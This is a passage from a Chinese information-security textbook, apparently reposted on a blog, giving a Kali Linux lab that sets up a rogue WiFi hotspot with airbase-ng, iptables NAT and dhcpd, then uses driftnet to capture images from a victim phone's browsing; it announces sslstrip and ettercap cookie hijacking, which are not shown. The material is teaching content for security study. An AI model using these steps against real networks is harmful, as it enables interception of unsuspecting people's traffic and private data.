信息安全技术实用教程第4版张同光ISBN97871214230317.5实例——KaliLinux中创建WiFi热点

信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---7.5实例——KaliLinux中创建WiFi热点

https://www.cnblogs.com/ztguang/p/12828764.html

主  编:     张同光

ISBN号: 978-7-121-42303-1             9787121423031
出版日期:   2021-11-20
出版社:     电子工业出版社

页码:  定价:¥69.80元


7.5  实例——Kali Linux中创建WiFi热点

这里再介绍一种方法,是使用airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie

实验环境如7.12所示。

 7.12  实验环境

1步:开启终端1建立WiFi热点

开启终端1依次执行如下命令,具体过程如7.13所示。

# ifconfig -a //查看无线网络接口为wlan0

# ifconfig wlan0 down

# iwconfig wlan0 mode monitor

# ifconfig wlan0 up

SIOCSIFFLAGS: Operation not possible due to RF-kill

# rfkill list

# rfkill unblock 0

# ifconfig wlan0 up

# airbase-ng -e ztg wlan0 //建立WiFi热点

airbase-ng建立WiFi热点WiFi热点的网络流量会被定向at0虚拟网络接口上。

 7.13  建立WiFi热点

2步:开启终端2,执行iptables命令

开启终端2,将如下命令放到一个命令行执行,如7.14所示。

ifconfig at0 up

ifconfig at0 192.168.1.1 netmask 255.255.255.0

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F

iptables -X

iptables -Z

iptables -t nat -F

iptables -t nat -X

iptables -t nat -Z

iptables -t mangle -F

iptables -t mangle -X

iptables -t mangle -Z

iptables -P INPUT ACCEPT

iptables -P OUTPUT ACCEPT

iptables -P FORWARD ACCEPT

iptables -t nat -P PREROUTING ACCEPT

iptables -t nat -P OUTPUT ACCEPT

iptables -t nat -P POSTROUTING ACCEPT

iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE    //这条命令很关键

 

7.14  执行iptables命令

3步:开启终端3开启dhcpd

执行apt-get install isc-dhcp-server命令安装dhcp软件包

编辑dhcp配置文件/etc/dhcp/dhcpd.conf,内容如下:

default-lease-time 600;

max-lease-time 7200;

authoritative;

subnet 192.168.1.0 netmask 255.255.255.0 {

    option routers 192.168.1.1;

    option subnet-mask 255.255.255.0;

    option domain-name "ztg";

    option domain-name-servers 10.3.9.4;

    range 192.168.1.20 192.168.1.50;

}

开启终端3执行如下命令开启dhcpd7.15所示。

# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

4步:捕获被欺骗者手机流量

看到7.16最后一行,说明欺骗者手机已经连接WiFi热点在手机上使用浏览器访问http://www.ebay.cn/

 7.16  欺骗者手机已经连接WiFi热点

攻击者电脑上,开启终端4执行driftnet -i at0命令,捕获欺骗者访问http://www.ebay.cn/网站时页面中所包含的图片7.17所示。

    

7.17  捕获的图片 7.18  保存捕获的图片

原文地址:https://www.cnblogs.com/ztguang/p/15611978.html